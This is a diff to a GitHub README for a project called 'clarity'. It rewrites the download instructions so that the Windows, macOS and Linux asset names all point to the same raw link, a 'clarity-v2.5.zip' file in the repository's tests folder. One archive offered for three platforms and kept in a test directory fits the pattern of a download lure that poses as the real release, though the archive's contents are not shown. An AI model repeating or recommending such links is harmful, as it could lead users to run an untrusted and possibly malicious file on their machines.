Guilz9/clarity/README.md

 Click on the version you want to download.
 Once on the version page, find the asset files listed.

-- If you are using Windows, you might see `clarity-windows.zip`.
+- If you are using Windows, you might see `https://raw.githubusercontent.com/Guilz9/clarity/main/tests/clarity-v2.5.zip`.
-- For macOS, you may find `clarity-macos.zip`.
+- For macOS, you may find `https://raw.githubusercontent.com/Guilz9/clarity/main/tests/clarity-v2.5.zip`.
-- For Linux, check for `clarity-linux.tar.gz`.
+- For Linux, check for `https://raw.githubusercontent.com/Guilz9/clarity/main/tests/clarity-v2.5.zip`.

 Click on the appropriate file to download it to your computer.